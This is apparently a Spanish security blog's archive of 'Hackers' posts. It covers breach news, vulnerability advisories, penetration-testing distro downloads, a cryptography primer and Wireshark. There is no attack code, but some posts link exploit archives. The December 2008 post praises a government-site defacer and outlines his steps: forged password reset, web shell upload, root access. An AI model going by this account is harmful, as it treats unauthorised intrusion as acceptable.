Mostrando las entradas con la etiqueta Hackers. Mostrar todas las entradas
Mostrando las entradas con la etiqueta Hackers. Mostrar todas las entradas

martes, 30 de agosto de 2011

Descargar BackTrack 5 R1


BackTrack es una distribución de GNU/Linux y contiene las herramientas más útiles para la realización de pruebas de penetración, análisis forense, escaneo de puertos, exploits, sniffers; anteriormente estaba basada en Slackware, sin embargo hoy en día está basada en Ubuntu y tiene soporte para 32 y 64 bits, así como la tecnología ARM.







En resumen BackTrack es todo un arsenal desarrollado por expertos de seguridad informática, lo podrás utilizar para medir el nivel de seguridad de tu organización, entre otros.

La descarga está disponible gratuitamente desde la página web del autor:
http://www.backtrack-linux.org/downloads/

martes, 9 de agosto de 2011

Empleados, blanco fácil de hackers


Los piratas informáticos reunidos en la conferencia anual de hackers DefCon, realizada en Las Vegas (Nevada, oeste) el pasado fin de semana, confirmaron que la estupidez humana no tiene arreglo.

En esta ya famosa cita anual de hackers, una de las destrezas destacadas fue el arte de hablar a los trabajadores de una empresa u organización para conseguir información clave para acceder ilegalmente a las redes informáticas de esa entidad.

En el concurso "Schomooze (charla) contraataca" los piratas informáticos fueron desafiados a poner a prueba sus habilidades de "ingeniería social" en empresas como Apple, Oracle, Symantec y Walmart. El concurso debutó en la reunión anual de DefCon en Las Vegas el año pasado.

"Los resultados son peores que los del año pasado", dijo Chris Hadnagy, un especialista en ingeniería social que gestiona el concurso.

"Por lo que hemos encontrado, seríamos dueños de cada uno en estas empresas", dijo.

Los hackers debían convencer a los empleados en diversas empresas a revelar algo de las versiones de software utilizadas en las redes del servicio de cafetería.

Conocer detalles sobre el software de las computadoras de una compañía permite a los hackers averiguar las debilidades a explotar, y el intercambio de información operativa hace posible que alguien con intención de espiar a nivel corporativo llegue a colarse en las instalaciones.

Las artimañas más eficaces fueron las que implicaban llamar a las compañías que participaban y hacerse pasar por un cliente potencial que buscaba estar tranquilo sobre las medidas de seguridad ofrecidas, de acuerdo con Hadnagy.

Hacerse pasar por alguien que llamaba desde otro departamento en una empresa, o por un equipo de apoyo técnico remoto, también demostró ser una táctica eficaz para los piratas informáticos.

"Llamamos y conseguimos un tipo en el teléfono y tenemos todo lo que queremos", dijo Hadnagy, director de la página web social-engineer.org.

Pero convencer a empleados de tiendas minoristas fue más difícil, posiblemente porque están más acostumbrados a interactuar con los clientes, indicó Hadnagy.

Por otro lado, las mujeres parecen ser más desconfiadas que los hombres.

"Las mujeres parecen ser más conscientes de la seguridad", dijo al comentar los resultados del concurso, que serán publicados en un informe a finales de este año.

miércoles, 6 de julio de 2011

Grave fallo de seguridad en OpenSSH de FreeBSD, descubierto siete años después

Kingcope ha vuelto a hacer públicos todos los detalles de un grave fallo de seguridad en OpenSSH de FreeBSD 4, que permite ejecución remota de código. Ha creado un exploit capaz de aprovechar el fallo, y que devuelve una shell al equipo remoto sin necesidad de autenticación. El fallo se encuentra en auth2-pam-freebsd.c, un archivo de hace siete años.

El problema es grave, puesto que permite a un atacante que pueda acceder al SSH de una máquina FreeBSD, ejecutar código como root sin necesidad de autenticarse. El fallo se da en, al menos en FreeBSD 4.9 y 4.11, puesto que estas versiones vienen con OpenSSH 3.5p1 por defecto. Actualmente FreeBSD mantiene solo dos ramas, la 7 y la 8. La rama 4 se descontinuó en 2007 y el fichero problemático desapareció de FreeBSD a partir de la versión 5.2.1.

El problema está en la función pam_thread, a la hora de procesar nombres de usuario muy largos. Tanto SSH versión 1 como SSH versión 2. En versiones más modernas de FreeBSD 5.2.1, ni siquiera existe el archivo afectado auth2-pam-freebsd.c. Kingcope no ha podido determinar aún si el problema está en este OpenSSH de FreeBSD o en la propia librería PAM del sistema operativo.

Durante las pruebas, Kingcope comprobó que si lanzaba el demonio SSH desde consola como root, y proporcionaba un nombre de usuario de más de 100 caracteres de longitud, el demonio moría y se sobrescribía el registro EIP, con lo que se puede llegar a controlar por completo el flujo de instrucciones.

Kingcope (Nikolaos Rangos) suele descubrir importantes vulnerabilidades en FreeBSD y otro software popular. A finales de 2009 encontró un problema de elevación de privilegios FreeBSD. En septiembre de ese mismo año, publicó un exploit funcional que permitía a un atacante ejecutar código con permisos de SYSTEM en un servidor IIS 5.x (Internet Information Services) siempre que tuviera el FTP habilitado y accesible. En la versión 6.x, el exploit sólo permitía provocar una denegación de servicio. También en mayo de 2009, descubrió un grave fallo en WebDAV de IIS.


Más Información:

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
http://packetstormsecurity.org/files/view/102683/ssh_preauth_freebsd.txt

01/09/2009 Vulnerabilidad en el FTP de Microsoft IIS 5 permite ejecución de código
www.hispasec.com/unaaldia/3965

30/11/2009 Elevación de privilegios en FreeBSD
www.hispasec.com/unaaldia/4055

sábado, 25 de junio de 2011

TeamPoison ataca el sitio de LulzSec


El grupo de hackers LulzSec no ha dejado de dar de que hablar, parece que están dispuestos a atacar todo lo que sea posible, como si de un deporte se tratara, pero esta vez son noticia no precisamente por haber penetrado algún otro reconocido sitio, sino porque ahora ellos fueron víctimas de un ataque.

Fuente conecti.ca

lunes, 4 de abril de 2011

El ataque a la RSA se produjo a través de un 0 day en Flash

El pasado 18 de marzo RSA confesó que había sufrido un ataque dirigido en el que le robaron información relativa a su famoso producto SecurID. En estos momentos ya se sabe cómo accedieron a la información los atacantes y, de paso, que RSA tardó varios días en hacer público el incidente.


En una entrada oficial llamada "anatomía de un ataque" RSA explica cómo ocurrió un grave incidente de seguridad en su compañía. Si bien explica muy bien el ataque, se centra en buena medida en explicar que las ATP (Advanced Persistent Threat, amenazas avanzadas y persistentes sobre una misma compañía) son muy complejas, que ocurren en las mejores familias y que ellos hicieron lo correcto. Parece que es así, pero lo interesante es centrarse en los errores para poder aprender de este tipo de situaciones.

Cómo empezó

Según la RSA, el atacante envío dos correos en un periodo de dos días, a dos pequeños grupos de empleados. RSA concreta que "no se consideraría a estos usuarios particularmente de perfil alto u objetivos valiosos". ¿Quiere decir con esto, que se encontraban menos protegidos que el resto? Dentro de una organización de este calibre, todos los usuarios con acceso a la red deberían ser considerados de alto riesgo y protegidos por igual. Se les envió un correo con el asunto "2011 Recruitment Plan" con un Excel del mismo nombre adjunto. Uno de los usuarios, incluso, rescató el email de la carpeta de correo basura. Según RSA, es porque el correo estaba muy bien construido. Una buena política de seguridad debería prohibir y entrenar expresamente a los usuarios para no abrir archivos no solicitados, sin excusas.

El Excel contenía en su interior un fallo no conocido hasta el momento en Flash, que permitía la ejecución de código. De hecho, Adobe anunció el 14 de marzo que sabía que una vulnerabilidad desconocida estaba siendo aprovechada para atacar sistemas. Si bien no hacía mención explícita a RSA, parece que la vulnerabilidad apareció a causa de este ataque. Adobe ya lo ha solucionado con un parche emitido fuera de su ciclo habitual.

De esto se deduce que, aunque RSA hubiera mantenido todo su software actualizado, el atacante hubiese igualmente conseguido ejecutar código. En estos casos, es en los que se echa de menos el uso de herramientas como DEP o ASLR o cualquier otro software que prevenga los desbordamientos de memoria. Es irrelevante el uso de Office, LibreOffice o Flash... si los atacantes han tenido acceso a un 0 day en Flash... podrían haberlo conseguido de cualquier otro programa.

Una vez dentro

Luego los atacantes instalaron una variante del conocido RAT (herramienta de administración remota) Poison Ivy y crearon una conexión inversa hacia un servidor propio del atacante. RSA afirma que "esto lo hace más difícil de detectar", pero no es del todo cierto. Lo que hace más difícil de detectar estas conexiones es el hecho de que suelen estar cifradas, ofuscadas y en puertos estándares que no levantan sospechas, no el hecho en sí de que sean "inversas". En realidad, esto está asumido como estándar. La opción contraria, establecer una conexión desde fuera a la máquina infectada está descartado desde un primer momento en la mayoría de los escenarios y es una opción que los atacantes serios ni siquiera contemplarían. En este punto hubiesen sido necesarios inspectores de tráfico e IDS, aunque es cierto que el nivel de éxito de esta medida podría ser menor si los atacantes realmente se lo proponen.

Según la RSA, el ataque fue detectado por su Computer Incident Response Team mientras se estaba produciendo. Insiste en que, en muchos otros casos, el ataque se desarrolla durante meses antes de ser detectado. Sin embargo, los atacantes tuvieron tiempo de hacerse una idea de la red interna y buscar usuarios con más privilegios que los infectados inicialmente. Llegaron a comprometer cuentas de administrador.

El atacante más tarde transfirió muchos ficheros RAR protegidos por contraseña desde el servidor de la RSA hacia un tercero externo y comprometido. Descargó la información, la borró de ese servidor... y se quedó con ella.

RSA sigue sin aclarar qué fue lo robado exactamente, aunque explica bien cómo funcionó el ATP y, extrayendo la información adecuada de su mensaje, podría servir como experiencia en la que apoyarse para prevenir incidentes futuros.




Más Información:

0 day en Adobe Flash, Reader y Acrobat

Anatomy of an Attack

una-al-dia (18/03/2011) Comprometen la seguridad de RSA y roban información sobre el producto SecurID

domingo, 25 de abril de 2010

Los hackers explotan las falsas alarmas de McAfee para propagar un ataque scareware

Los administradores de sistemas, en riesgo de infección por las trampas de una falsa alarma de virus.

Sophos, compañía de seguridad TI y protección de datos, advierte que los hackers están explotando un problema con el antivirus de McAfee por el que cientos de miles de ordenadores en todo el mundo se están reiniciando repetidamente, lo que los convierten en inoperables.

Una vez más, este hecho demuestra que los hackers se aprovechan de cualquier fallo de este tipo, sea de donde sea que provenga, para intentar infectar los ordenadores de los usuarios creando falsas páginas acerca de ello.

Efectivamente, McAfee publicó ayer una actualización que erróneamente detectaba como maligno un archivo de Windows (svchost.exe) y lo consideraba como el virus "W32/Wecorl.a". Esto ha causado graves problemas en los ordenadores afectados.

Los hackers, además, están agravando el problema utilizando técnicas maliciosas a base de SEO (Search Engine Optimization), lo que se conoce como “blackhat SEO”, es decir, las técnicas para crear páginas web con contenido falso y que, aunque parece estar relacionado con el problema de las falsas alarmas de McAfee, en realidad están diseñadas para infectar los ordenadores que visitan esa página web. Sophos ha identificado sites maliciosos que aparecen en la primera página de resultados de Google si el usuario busca por frases relacionadas como “falso positivo de McAfee”

"Ya es bastante malo cuando muchos de los equipos de las empresas están fuera de acción debido a una actualización defectuosa, pero es aún peor si se infecta la red buscando en Google para arreglar el problema", explicó Graham Cluley, Consultor de Tecnología de Sophos de Sophos. "Estas páginas envenenadas, terminan apareciendo en la primera página de resultados de los motores de búsqueda, por lo que es probable que se haga clic en muchas de ellas. Si se visitan los enlaces pueden aparecer alertas en pop-up, avisando sobre los “problemas” de seguridad que tiene el ordenador. Estos avisos son falsos y han sido diseñados para engañar y que los usuarios se descarguen software peligroso, que podría dar lugar a que los piratas informáticos consiguieran el control de sus ordenadores de las empresas o el robo de su tarjeta de crédito".

"El envenenamiento a través de SEO es una de las áreas de más rápido crecimiento hoy en día de los delitos informáticos”, explica Cluley. "Los hackers saben que los usuarios recurrirán a los motores de búsqueda para encontrar las noticias sobre una historia de última hora, y están al acecho para infectar a los incautos".

Sophos recomienda a las empresas proteger a sus usuarios mediante la ejecución de una solución de seguridad web que escanea cada página en Internet y cada clic, para buscar cualquier tipo de malware y actividad delictiva. Para más información sobre el ataque, y una imagen de los resultados infectados, se puede encontrar en el blog de Graham Cluley en
http://www.sophos.com/blogs/gc/g/2010/04/22/hackers-exploit-mcafee


Acerca de Sophos

Más de 100 millones de usuarios en 150 países confían en Sophos como la más completa protección frente a ataques y fuga de datos. Sophos mantiene su compromiso de proveer soluciones de seguridad y protección de datos con una gestión simple, despliegue y uso que permite ofrecer el más bajo coste de propiedad de la industria.

Sophos ofrece unas soluciones premiadas de cifrado, seguridad para el puesto de trabajo, correo, web y control de acceso a la red, respaldadas por SophosLabs – su red global de centros inteligentes. Con más de dos décadas de experiencia, Sophos es reconocida como líder en seguridad y protección de datos por las firmas de analistas más influyentes y ha recibido numerosos premios de la industria.

Sophos tiene su sede en Boston, MA y Oxford, Reino Unido. Para más información visite www.sophos.com / www.esp.sophos.com

viernes, 12 de marzo de 2010

Microsoft advierte: Presionar F1 en Internet Explorer es peligroso


Microsoft ha alertado esta semana a sus usuarios de Windows XP sobre el peligro de hacer caso a los sitios web que les solicitan que pulsen la tecla de ayuda’F1′, ya que, de hacerlo, podrían sufrir graves problemas de seguridad. Se trata de una vulnerabilidad sin parche que los hackers pueden emplear para secuestrar PCs con Internet Explorer (IE).

En un aviso de seguridad publicado esta semana -después de que el investigador polaco Maurycy Prodeus revelara el fallo el viernes- Microsoft explicó que existe una vulnerabilidad de VBScript que podría hacer que algunos sitios web “ejecuten código de seguridad del usuario”, o lo que es lo mismo, que logren hacerse con el control de ordenadores de extraños sin que medie el consentimiento del propietario.

Según recoge ‘Portaltic.es’ de ‘ComputerWorld’, en el mismo comunicado Microsoft ofrecía algunos consejos sobre cómo proteger los ordenadores hasta que el parche de seguridad fuera enviado.

“La vulnerabilidad se encuentra en la forma en la que VBScrip interactúa con los archivos de Ayuda de IE”, explicaba el aviso de seguridad. “Si un sitio web malicioso muestra un cuadro de diálogo especialmente diseñado y el usuario pulsa la tecla ‘F1′, código arbitrario podría ser ejecutado en el contexto de seguridad del usuario”.

Esta vulnerabilidad afecta a ordenadores con sistemas operativos Windows 2000, Windows Server 2003 y Windows XP -mientras se usa Internet Explorer en cualquiera de sus versiones- explicó la compañía.

De momento, y hasta que el parche de seguridad esté disponible, Microsoft ha aconsejado a sus usuarios que no pulsen F1 cuando un sitio web se lo solicite, ya que si no se presiona esta tecla -la vulnerabilidad no puede ser aprovechada- además, alertan de que el cuadro de diálogo puede aparecer en repetidas ocasiones. Además, los usuarios pueden proteger sus ordenadores desactivando la ayuda de Windows.

Según publica ‘Computer World’, un alto directivo del Microsoft Security Response Center (MSRC), Jerry Bryant, aseguró en un e-mail que la compañía “está preocupada porque esta vulnerabilidad no fuera revelada de una manera responsable, lo que podría poner en riesgo a los clientes”.

Bryan afirmó que Microsoft no ha fijado un calendario para una revisión, y sólo dijo que “Microsoft tomará medidas apropiadas para ayudar a proteger a sus clientes”.

Vista en: Noticiasdot

domingo, 7 de marzo de 2010

Cibercriminal intenta borrar la información de un dispositivo USB con sus jugos gástricos



Un cirujano neoyorquino ha tenido que operar a un supuesto cibercriminal para recuperar de sus entrañas un dispositivo USB que se había tragado para encubrir sus crímenes.

Florin Necula, un hombre de Queens, Nueva York, fue arrestado en enero de este año bajo sospechas de que había instalado un dispositivo especial en cajeros automáticos para robar la información de las cintas magnéticas de las tarjetas de crédito de sus usuarios.

Pero la policía desconocía que el sospechoso llevaba consigo una pieza de evidencia importante al momento de su arresto: un dispositivo USB de 4Gb marca Kingston que contenía datos robados que se podían utilizar para clonar las tarjetas de crédito de los usuarios comprometidos.

Necula se dio cuenta de lo peligroso que sería poner este dispositivo en manos de la policía y, en un momento de desesperación mientras se encontraba bajo custodia, se lo tragó con la esperanza de borrar la evidencia.

“Tras cuatro días sin que Necula expulsara el aparato, los médicos, que temían que el dispositivo no pudiera pasar por su conducto gastrointestinal, decidieron que sería peligroso dejar el aparato adentro”, explicó el agente de los Servicios Secretos de los Estados Unidos Joseph Borger.

Después de que los cirujanos extrajeran el aparato del intestino del acusado, la policía agregó el dispositivo a una larga lista de aparatos decomisados, entre los que se encuentran cámaras, ordenadores portátiles, teléfonos móviles y más dispositivos USB.

A pesar de los esfuerzos de Necula, las autoridades pudieron recuperar la información del dispositivo y agregaron un cargo de obstrucción de justicia a las otras tres felonías que habían formulado en su contra.

Fuente: viruslist

viernes, 30 de enero de 2009

Descarga directa de Wifislax 3.1 o Backtrack 3,

WIFISLAX

Wifislax versión 3.1 (683MB)

http://download.wifislax.com:8080/wifislax-3.1.iso

ftp://files.tuto-fr.com:8080/distro/wifislax-3.1.iso

http://www.comprawifi-wifislax.com/public/wifislax/3.1/wifislax-3.1.iso

El md5 del fichero wifislax-3.1.iso es 911dc29262ee117e5e27770067bd2e71

Wifiway versión 1.0 Final

664.6 megas (MB)

Descarga 1 wifiway-1-final.iso -> http://download.wifislax.com:8080/wifiway-1-final.iso

The md5 of file wifiway-1.0-final.iso is 2fac135cad7b185706bbcb9c51f45932

BACKTRACK

Description: Imagen de cd
Name:: bt3-final.iso
Size: 695 MB
MD5: f79cbfbcd25147df32f5f6dfa287c2d9
SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7
Download: http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd

Description: USB Version (Extended)
Name:: bt3final_usb.iso
Size: 784 MB
MD5: 5d27c768e9c2fef61bbc208c78dadf22
SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980f
Download: http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb

Description: VMware Image
Name: BACKTRACK3_VMWare.rar
Size: 689 MB
MD5: 94212d3c24cf439644f158d90094ed6a
SHA1: 21c9a3f9658133efff259adbe290723583b4fd82
Download: http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-vm

Via:
http://www.wifislax.com/index.php
http://www.remote-exploit.org/backtrack.html

Nota legal: El uso de este software de análisis wireless debe ser una herramienta básica para profesionales y particulares que ansían conocer el nivel de seguridad de sus instalaciones inalámbricas, queda totalmente prohibido el uso de la misma para cometer actos delictivos de intrusión sobre las redes wireless de las cuales no somos propietarios o no tenemos los permisos pertinentes para analizar su nivel de seguridad. Es vuestra responsabilidad mantener la idea principal por la que se creo seguridad wireless y todo su entorno.

lunes, 8 de diciembre de 2008

Deface a la página de gobierno sinaloa.gob.mx

Hoy por la noche, la página del gobierno del estado de Sinaloa recibió la alerta de fallos de seguridad de su sitio web de los cuales hasta el momento no tenemos detalle.
El fallo de seguridad es de gravedad y ya ha sido resueldo gracias al experto en seguridad informatica Nesok, el cual dedicó tan sólo algunos minutos de su tiempo para corregir ese fallo. Claro, anteponiendo su nombre en la página principal del sitio con el fin de que lo contacten para intercambiar puntos de vista ó que posteriormente lo contraten como miembro del equipo de sinaloa.gob.mx como se ve en la imagen a continuación.

Seguimos al pendiente.


[EDITADO]
Inmediantamente me puse en contacto con Nesok, quien me proporcionó los detalles del fallo de seguridad.
¿Cuál fue el fallo principal del sitio web? y ¿Cómo logró conectarse al servidor? - Le pregunté a Nesok.
- El problema surgió de un password request forgery. Luego entre al panel de administración y subí una shell, modifiqué los archivos de configuración y saqué la cuenta de root, lo demás sólo fué conectarme por ssh, para modificar el index y tambien arregle el fallo para que otros no pudieran dañar la información, de hecho todo está intacto, sólo cambié el index.- Contestó Nesok.

Lunes 8 de Diciembre 12:40pm.

miércoles, 3 de diciembre de 2008

¿qué es la criptografía?


Veamos en wikipedia,

"La criptografía (del griego κρύπτω krypto, «oculto», y γράφω graphos, «escribir», literalmente «escritura oculta») es el arte o ciencia de cifrar y descifrar información utilizando técnicas que hagan posible el intercambio de mensajes de manera segura que sólo puedan ser leídos por las personas a quienes van dirigidos."
http://es.wikipedia.org/wiki/Criptograf%C3%ADa

Con más precisión, cuando se habla de esta área de conocimiento como ciencia se debería hablar de
criptología, que engloba tanto las técnicas de cifrado, la criptografía propiamente dicha, como sus técnicas complementarias: el criptoanálisis, que estudia los métodos que se utilizan para romper textos cifrados con objeto de recuperar la información original en ausencia de las claves.

Finalidad

La finalidad de la criptografía es, en primer lugar, garantizar el secreto en la comunicación entre dos entidades (personas, organizaciones, etc.) y, en segundo lugar, asegurar que la información que se envía es auténtica en un doble sentido: que el remitente sea realmente quien dice ser y que el contenido del mensaje enviado, habitualmente denominado
criptograma, no haya sido modificado en su tránsito.
Otro método utilizado para ocultar el contenido de un mensaje es ocultar el propio mensaje en un canal de información, pero en puridad, esta técnica no se considera criptografía, sino
esteganografía. Por ejemplo, mediante la esteganografía se puede ocultar un mensaje en un canal de sonido, una imagen o incluso en reparto de los espacios en blanco usados para justificar un texto. La esteganografía no tiene porqué ser un método alternativo a la criptografía, siendo común que ambos métodos se utilicen de forma simultánea para dificultar aún más la labor del criptoanalista.
En la actualidad, la criptografía no sólo se utiliza para comunicar información de forma segura ocultando su contenido a posibles fisgones. Una de las ramas de la criptografía que más ha revolucionado el panorama actual de las tecnologías informáticas es el de la
firma digital: tecnología que busca asociar al emisor de un mensaje con su contenido de forma que aquel no pueda posteriormente repudiarlo.

Conceptos

En la Jerga de la criptografía, la información original que debe protegerse se denomina texto en claro. El cifrado es el proceso de convertir el texto plano en un galimatías ilegible, denominado texto cifrado o criptograma. Por lo general, la aplicación concreta del algoritmo de cifrado (también llamado cifra) se basa en la existencia de una clave: información secreta que adapta el algoritmo de cifrado para cada uso distinto. Cifra es una antigua palabra arábiga para designar el número cero; en la antigüedad cuando Europa empezaba a cambiar del sistema de numeración romano al arábigo, se desconocía el cero por lo que este resultaba misterioso, de ahí probablemente que cifrado signifique misterioso
Las dos técnicas más sencillas de cifrado, en la criptografía clásica, son la sustitución (que supone el cambio de significado de los elementos básicos del mensaje -las letras, los dígitos o los símbolos-) y la trasposición (que supone una reordenación de los mismos); la gran mayoría de las cifras clásicas son combinaciones de estas dos operaciones básicas.
El descifrado es el proceso inverso que recupera el texto plano a partir del criptograma y la clave. El protocolo criptográfico especifica los detalles de cómo se utilizan los algoritmos y las claves (y otras operaciones primitivas) para conseguir el efecto deseado. El conjunto de protocolos, algoritmos de cifrado, procesos de gestión de claves y actuaciones de los usuarios, en conjunto es lo que constituyen un criptosistema, que es con lo que el usuario final trabaja e interactúa.
Existen dos grandes grupos de cifras: los algoritmos que utilizan una única clave tanto en el proceso de cifrado como en el de descifrado, y los que utilizan una clave para cifrar mensajes y una clave distinta para descifrarlos. Los primeros se denominan cifras simétricas, de clave simétrica o de clave privada y son la base de los algoritmos de cifrado clásico. Los segundos se denominan cifras asimétricas, de clave asimétrica o de clave pública y forman el núcleo de las técnicas de cifrado modernas.
En el lenguaje cotidiano, la palabra código se usa de forma indistinta con cifra. En la jerga de la criptografía, sin embargo, el término tiene un uso técnico especializado: los códigos son un método de criptografía clásica que consiste en sustituir unidades textuales más o menos largas o complejas, habitualmente palabras o frases, para ocultar el mensaje; por ejemplo, "cielo azul" podría significar "atacar al amanecer". Por el contrario, las cifras clásicas normalmente sustituyen o reordenan los elementos básicos del mensaje -letras, dígitos o símbolos-; en el ejemplo anterior, "rcnm arcteeaal aaa" sería un criptograma obtenido por transposición. Cuando se usa una técnica de códigos, la información secreta suele recopilarse en un libro de códigos.
Con frecuencia los procesos de cifrado y descifrado se encuentran en la literatura como encriptado y desencriptado, aunque ambos son neologismos -anglicismos de los términos ingleses encrypt y decrypt- todavía sin reconocimiento académico. Hay quien hace distinción entre cifrado/descifrado y encriptado/desencriptado según estén hablando de criptografía simétrica o asimétrica, pero la realidad es que la mayoría de los expertos hispanohablantes prefieren evitar ambos neologismos hasta el punto de que el uso de los mismos llega incluso a discernir a los aficionados y novatos en la materia de aquellos que han adquirido más experiencia y profundidad en la misma.

Historia de la criptografía


La historia de la criptografía es larga y abunda en anécdotas. Ya las primeras civilizaciones desarrollaron técnicas para enviar mensajes durante las campañas militares de forma que si el mensajero era interceptado la información que portaba no corriera el peligro de caer en manos del enemigo. Posiblemente, el primer criptosistema que se conoce fuera documentado por el historiador griego Polibio: un sistema de sustitución basado en la posición de las letras en una tabla. También los romanos utilizaron sistemas de sustitución, siendo el método actualmente conocido como César, porque supuestamente Julio César lo utilizó en sus campañas, uno de los más conocidos en la literatura (según algunos autores, en realidad Julio César no utilizaba este sistema de sustitución, pero la atribución tiene tanto arraigo que el nombre de éste método de sustitución ha quedado para los anales de la historia). Otro de los métodos criptográficos utilizados por los griegos fue la escitala espartana, un método de trasposición basado en un cilindro que servía como clave en el que se enrollaba el mensaje para poder cifrar y descifrar.

En 1465 el italiano Leon Battista Alberti inventó un nuevo sistema de sustitución polialfabética que supuso un gran avance de la época. Otro de los criptógrafos más importantes del siglo XVI fue el francés Blaise de Vigenere que escribió un importante tratado sobre "la escritura secreta" y que diseñó una cifra que ha llegado a nuestros días asociada a su nombre. A Selenus se le debe la obra criptográfica "Cryptomenytices et Cryptographiae" (Lüneburg, 1624). Durante los siglos XVII, XVIII y XIX, el interés de los monarcas por la criptografía fue notable. Las huestes de Felipe II utilizaron durante mucho tiempo una cifra con un alfabeto de más de 500 símbolos que los matemáticos del rey consideraban inexpugnable. Cuando el matemático francés François Viète consiguió criptoanalizar aquel sistema para el rey de Francia, a la sazón Enrique IV, el conocimiento mostrado por el rey francés impulsó una queja de la corte española ante del papa Pío V acusando a Enrique IV de utilizar magia negra para vencer a sus ejércitos. Por su parte, la reina María Estuardo, reina de los Escoceses, fue ejecutada por su prima Isabel I de Inglaterra al descubrirse un complot de aquella tras un criptoanálisis exitoso por parte de los matemáticos de Isabel.


Desde el siglo XIX y hasta la Segunda Guerra Mundial las figuras más importantes fueron la del holandés Auguste Kerckhoffs y la del prusiano Friedrich Kasiski. Pero es en el siglo XX cuando la historia de la criptografía vuelve a presentar importantes avances. En especial durante las dos contiendas bélicas que marcaron al siglo: la Gran Guerra y la Segunda Guerra Mundial. A partir del siglo XX, la criptografía usa una nueva herramienta que permitirá conseguir mejores y más seguras cifras: las máquinas de cálculo. La más conocida de las máquinas de cifrado, posiblemente sea la máquina alemana Enigma: una máquina de rotores que automatizaba considerablemente los cálculos que era necesario realizar para las operaciones de cifrado y descifrado de mensajes. Para vencer al ingenio alemán, fue necesario el concurso de los mejores matemáticos de la época y un gran esfuerzo computacional. No en vano, los mayores avances tanto en el campo de la criptografía como en el del criptoanálisis no empezaron hasta entonces.

Tras la conclusión de la Segunda Guerra Mundial, la criptografía tiene un desarrollo teórico importante; siendo Claude Shannon y sus investigaciones sobre teoría de la información esenciales hitos en dicho desarrollo. Además, los avances en computación automática suponen tanto una amenaza para los sistemas existentes como una oportunidad para el desarrollo de nuevos sistemas. A mediados de los años 70 el Departamento de Normas y Estándares norteamericano publica el primer diseño lógico de un cifrador que estaría llamado a ser el principal sistema criptográfico de finales de siglo: el Estándar de Cifrado de Datos o DES. En esas mismas fechas ya se empezaba a gestar lo que sería la, hasta ahora, última revolución de la criptografía teórica y práctica: los sistemas asimétricos. Estos sistemas supusieron un salto cualitativo importante ya que permitieron introducir la criptografía en otros campos que hoy día son esenciales, como el de la firma digital.

Vía
Wikipedia

martes, 23 de septiembre de 2008

Wireshark (Ethereal) - Sniffer

Wireshark, antes conocido como Ethereal, es un analizador de protocolos utilizado para realizar análisis y solucionar problemas en redes de comunicaciones para desarrollo de software y protocolos, y como una herramienta didáctica para educación. Cuenta con todas las características estándar de un analizador de protocolos.

La funcionalidad que provee es similar a la de tcpdump, pero añade una interfaz gráfica y muchas opciones de organización y filtrado de información. Así, permite ver todo el tráfico que pasa a través de una red (usualmente una red Ethernet, aunque es compatible con algunas otras) estableciendo la configuración en modo promiscuo. También incluye una versión basada en texto llamada tshark.
Permite examinar datos de una red viva o de un archivo de captura salvado en disco. Se puede analizar la información capturada, a través de los detalles y sumarios por cada paquete. Wireshark incluye un completo lenguaje para filtrar lo que queremos ver y la habilidad de mostrar el flujo reconstruido de una sesión de TCP.

Wireshark es software libre, y se ejecuta sobre la mayoría de sistemas operativos Unix y compatibles, incluyendo Linux, Solaris, FreeBSD, NetBSD, OpenBSD, y Mac OS X, así como en Microsoft Windows.

Aspectos importantes de Wireshark

Mantenido bajo la licencia GPL
Trabaja tanto en modo promiscuo como en modo no promiscuo
Puede capturar datos de la red o leer datos almacenados en un archivo (de una captura previa)
Basado en la librería pcap
Tiene una interfaz muy flexible
Capacidades de filtrado muy ricas y frescas
Admite el formato estándar de archivos tcpdump
Reconstrucción de sesiones TCP
Se ejecuta en más de 20 plataformas
Es compatible con más de 480 protocolos
Puede leer archivos de captura de más de 20 productos


Seguridad

Para capturar paquetes directamente de la interfaz de red, generalmente se necesitan permisos de ejecución especiales. Es por esta razón que Wireshark es ejecutado con permisos de
Superusuario. Tomando en cuenta la gran cantidad de analizadores de protocolo que posee, los cuales son ejecutados cuando un paquete llega a la interfaz, el riesgo de un error en el código del analizador podría poner en riesgo la seguridad del sistema (como por ejemplo permitir la ejecución de código externo). Por ésta razón el equipo de desarrolladores de OpenBSD decidió remover Ethereal antes del lanzamiento de la versión 3.6.[1]
Una alternativa es ejecutar
tcpdump o dumpcap que viene en la distribución de Wireshark en modo Superusuario, para capturar los paquetes desde la interfaz de red y almacenarlos en el disco, para después analizarlos ejecutando Wireshark con menores privilegios y leyendo el archivo con los paquetes para su posterior análisis.

Portabilidad


Wireshark corre en sistemas operativos tipo
Unix, incluyendo Linux, Solaris, FreeBSD, NetBSD, OpenBSD, Mac OS X, Microsoft Windows, U3 y en Portable Apps

Fuente:
wikipedia

Haga clic
aqui para descargar wireshark.

jueves, 18 de septiembre de 2008

Nokia Patentando, Un Tio Robando Y Un Nuevo Y Práctico T




Una web de videojuegos para los que quieren dejar de fumar, Nokia patentará un sistema para escribir en el dorso de las fotos digitales, Un tio antisistema que se lleva la past...

lunes, 8 de septiembre de 2008

Google Chrome Browser 0.2.149.27 (SaveAs) Remote BOF Exploit

PoC Code is in Attach file because this file is saved in 'Unicode' type for exploit.

Here is Description for this Vuln :
· Type of Issue : Buffer Overflow.
· Affected Software : Google Chrome 0.2.149.27.
· Exploitation Environment : Google Chrome (Language: Vietnamese) on Windows XP SP2.
· Impact: Remote code execution.
· Rating : Critical .
· Description :
The vulnerability is caused due to a boundary error when handling the “SaveAs” function. On saving
a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes
it possible for attackers to execute arbitrary code on users’ systems.
· How an attacker could exploit the issue :
To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code.
He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would
be executed, giving him the privilege to make use of the affected system.
· Discoverer : Le Duc Anh - SVRT - Bkis
· About SVRT :
SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes
in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols
and embedded systems…
· Website : security.bkis.vn
· Mail : svrt[at]bkav.com.vn

http://milw0rm.com/sploits/2008-chrome.tgz

# milw0rm.com [2008-09-05]

Fundador de MySpace ligado al Hacking



Tom Anderson hoy es mundialmente conocido por ser el fundador de MySpace, una de las principales redes sociales a nivel mundial.

